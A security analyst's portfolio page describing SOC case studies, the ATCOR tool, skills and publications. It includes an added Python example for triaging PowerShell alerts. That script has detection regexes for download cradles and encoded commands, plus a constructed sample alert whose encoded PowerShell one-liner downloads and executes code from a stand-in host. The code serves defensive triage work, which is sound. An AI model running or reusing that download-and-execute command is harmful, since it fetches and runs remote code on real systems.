CYBERSHARK Georgi Sharkov


CyberShark code. secure. dominate.

Georgi Sharkov builds SOC tooling, cyber research, and sharp web experiences under a single brand: CyberShark. The identity is built on sharp predator lines, electric blue highlights, red-alert pressure, and a security-first mindset.

Brand: CyberShark
Role: SOC Hunter
Signal: Red Alert

PROJECT FEED

Featured drops from the shark tank

01 / CORE

CyberShark Platform

The main CyberShark presence, built as a command deck for projects, analyst support, publications, and digital identity.

Brand anchor

02 / LAB

Experiments

A place for prototypes, AI work, web experiments, and code that came straight out of the neon abyss.

R&D stream

03 / SIGNAL

Working Tool: ATCOR

ATCOR / ATTCOR-CR is my active SOC-focused project, built to help analysts move from alert context to writeups, hunting queries, and handoff-ready outputs.


LIVE SIGNAL

Built in code. Driven by purpose. Feared by threats.

This page is designed to feel like a cyberpunk sonar sweep rather than a normal portfolio hero, shaped around Georgi Sharkov's GitHub presence, active SOC tooling, and a drive to make technical work feel sharp and memorable.

SHARK PROFILE

We don't follow paths. We breach them.

Georgi Sharkov uses this space as a neon front door for projects, experiments, SOC tools like ATCOR, and ongoing web builds. It is meant to feel direct, memorable, and a little dangerous, like a signal cutting through dark water.

GitHub Pages, Frontend Builds, SOC Tooling, Cyberpunk Identity, Creative Coding

SOC EXPERIENCE

Operational security work shaped by investigation discipline

My security focus sits at the intersection of SOC operations, digital forensics, threat hunting, and customer-facing reporting. I approach alerts as investigation problems first: validate the signal, identify the evidence that matters most, build the case narrative, and turn the outcome into clear next steps for both technical and non-technical audiences.

CASE STUDIES

Sanitised investigation patterns and outcomes

01 / POWERSHELL

Suspicious execution triage

Reviewed script execution alerts by validating user context, command-line intent, host exposure, and follow-on process activity before deciding between escalation, closure, or tuning.

Validation to disposition

02 / DOWNLOAD

Internet download investigations

Built browser-download case flow around file reputation, user confirmation, delivery path, execution evidence, and customer-safe remediation guidance for high-noise alerts.

User action to risk decision

03 / USB

Removable media review

Used host telemetry, removable-device evidence, file execution records, and timeline reasoning to assess whether USB activity represented normal business use or a case requiring escalation.

Device history and context
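To make the validation-to-disposition flow of the PowerShell case study (01) concrete, here is an added Python example; it is not code from this page or from ATCOR. It scores a script-execution alert on command-line intent (including the decoded payload of an -EncodedCommand argument), parent process, follow-on child processes, and host exposure, then returns one of the three dispositions named above: escalate, close, or tune. The alerts, the allowlisted parent/user pair, the indicator weights, and the escalation threshold are all constructed for illustration and would be replaced by an organisation's own baselines.

```python
"""Triage scoring for PowerShell script-execution alerts.

Added example (not the page's or ATCOR's code). All alert data, the
allowlist, the weights and the threshold below are constructed.
"""
import base64
import re
from dataclasses import dataclass, field

# Command-line indicators: name -> (pattern, weight). Weights are illustrative.
COMMAND_INDICATORS = {
    "encoded_command": (re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I), 3),
    "download_cradle": (re.compile(r"\b(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr|Net\.WebClient)\b", re.I), 2),
    "invoke_expression": (re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I), 2),
    "hidden_window": (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1),
    "execution_policy_bypass": (re.compile(r"-ex(?:ecutionpolicy)?\s+bypass", re.I), 1),
}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SUSPICIOUS_CHILDREN = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "certutil.exe"}
# (parent process, user) pairs confirmed benign in earlier cases (constructed allowlist)
KNOWN_BENIGN_CONTEXT = {("ccmexec.exe", "svc_sccm")}
ESCALATE_THRESHOLD = 5


@dataclass
class PowerShellAlert:
    host: str
    user: str
    parent_process: str
    command_line: str
    child_processes: list = field(default_factory=list)  # follow-on process activity
    internet_exposed: bool = False                        # host exposure


def decode_encoded_command(command_line: str) -> str:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or '' if absent/undecodable."""
    match = COMMAND_INDICATORS["encoded_command"][0].search(command_line)
    if not match:
        return ""
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le", errors="ignore")
    except (ValueError, UnicodeDecodeError):
        return ""


def command_indicators(command_line: str) -> set:
    """Indicator names matched in the visible command line and in any decoded payload."""
    text = command_line + "\n" + decode_encoded_command(command_line)
    return {name for name, (pattern, _) in COMMAND_INDICATORS.items() if pattern.search(text)}


def triage(alert: PowerShellAlert) -> dict:
    """Validate the signal, weigh the evidence, and return a disposition with its reasons."""
    indicators = command_indicators(alert.command_line)
    reasons = [f"command line: {name}" for name in sorted(indicators)]
    score = sum(COMMAND_INDICATORS[name][1] for name in indicators)

    parent = alert.parent_process.lower()
    if parent in OFFICE_PARENTS:  # command-line intent: Office spawning PowerShell
        score += 2
        reasons.append(f"parent {parent} is an Office application")

    bad_children = sorted(c for c in alert.child_processes if c.lower() in SUSPICIOUS_CHILDREN)
    score += 2 * len(bad_children)
    reasons += [f"follow-on process {c}" for c in bad_children]

    if alert.internet_exposed:
        score += 1
        reasons.append("host is internet exposed")

    allowlisted = (parent, alert.user.lower()) in KNOWN_BENIGN_CONTEXT
    if allowlisted and not bad_children and not indicators & {"encoded_command", "download_cradle"}:
        disposition = "tune"  # stable benign pattern: candidate for detection tuning
        reasons.append("matches a known benign parent/user pattern")
    elif score >= ESCALATE_THRESHOLD:
        disposition = "escalate"
    else:
        disposition = "close"
    return {"host": alert.host, "score": score, "disposition": disposition, "reasons": reasons}


def sample_alerts() -> list:
    """Constructed alerts, one per disposition (not real telemetry)."""
    payload = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
    encoded = base64.b64encode(payload.encode("utf-16le")).decode()
    return [
        PowerShellAlert("WS-0142", "jdoe", "winword.exe",
                        f"powershell.exe -NoP -W Hidden -enc {encoded}", ["rundll32.exe"]),
        PowerShellAlert("WS-0077", "svc_sccm", "ccmexec.exe",
                        r"powershell.exe -ExecutionPolicy Bypass -File C:\Windows\CCM\scripts\inventory.ps1"),
        PowerShellAlert("WS-0203", "jdoe", "explorer.exe",
                        "powershell.exe -NoProfile -Command Get-Process", internet_exposed=True),
    ]


if __name__ == "__main__":
    for alert in sample_alerts():
        result = triage(alert)
        print(f"{result['host']}: {result['disposition']} (score {result['score']})")
        for reason in result["reasons"]:
            print("  -", reason)
```

The reasons list is what ends up in the case narrative: each scoring step is a sentence an analyst can paste into a write-up, and the "tune" outcome records a benign pattern that recurs so the detection can be adjusted rather than closed again next week.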

SOC SUPPORT

Built to help SOC analysts move faster

Write-up Support

Customer-ready incident communication shaped for speed, clarity, and technical accuracy. This area covers investigation summaries, executive-safe customer updates, false-positive closures, confirmed-incident write-ups, containment recommendations, and reusable response wording for common alert types.

Includes triage summary templates, customer-safe update formats, internal-to-customer translation examples, and remediation wording that can be reused across repeated investigation outcomes.

Triage Workflow

A practical analyst path from alert intake to final disposition. This section is built around alert validation, evidence review, escalation triggers, severity decisions, and repeatable playbooks that keep investigations consistent across similar detections.

Focus areas include IOC prioritisation, decision logic, case disposition flow, and workflow patterns for PowerShell, browser downloads, USB activity, persistence, and PUP-related alerts.

Tooling and Automation

A working area for analyst efficiency: helper tools, hunting query packs, parser ideas, workflow accelerators, and small automations that reduce manual effort while improving investigation quality.

This is where ATCOR capability highlights, IOC extraction helpers, evidence quality checks, enrichment ideas, and cross-platform query generation can continue to grow into real operational tools.

DETECTION AND HUNTING

Turning repeat alert patterns into repeatable logic

I focus on converting investigation experience into reusable hunting and detection value: shaping queries that answer the real case question, identifying where detections need tuning, and building practical logic that supports analysts rather than overwhelming them with noise.

Detection Thinking

Build around behaviour, supporting evidence, and analyst workflow so alerts are easier to validate and explain.

Hunting Queries

Develop cross-platform hunting logic for endpoint activity, user behaviour, downloads, persistence, and suspicious execution chains.

Tuning Mindset

Reduce repeated false positives by identifying stable benign patterns without weakening meaningful detection coverage.

SKILLS AND STACK

Core capabilities and platforms

Core Skills

Threat Hunting, DFIR, Incident Response, Alert Triage, IOC Analysis, Customer Reporting, Case Narrative Building, Detection Tuning

Tool Stack

Microsoft Sentinel, Defender XDR, Splunk, Elastic, CrowdStrike, Carbon Black, Darktrace, ATCOR

CERTIFICATIONS AND TRAINING

Formal learning backed by practical analyst work

FOR508: Advanced Incident Response, Threat Hunting, and Digital Forensics

Advanced DFIR training focused on incident response methodology, threat hunting discipline, forensic reasoning, host artefacts, and practical investigation tradecraft under real-world pressure.

Continuous Analyst Development

Ongoing development across SOC workflows, detection logic, reporting quality, security tooling, and investigative decision making, with a focus on improving both analyst speed and output quality.

PUBLICATION SIGNAL

Selected publications and featured expert coverage

Kroll Conversations: Meet the SOC Experts

Georgi Sharkov is featured as the first Kroll Cyber Academy alum to move into the SOC, contributing to real-time threat triage, escalation, client-focused reporting, and continuous tool and workflow improvement.


Securing Smart Home Environment Using Edge Computing

IEEE International Smart Cities Conference (ISC2), September 26, 2022. A publication focused on improving smart home security through edge computing approaches.
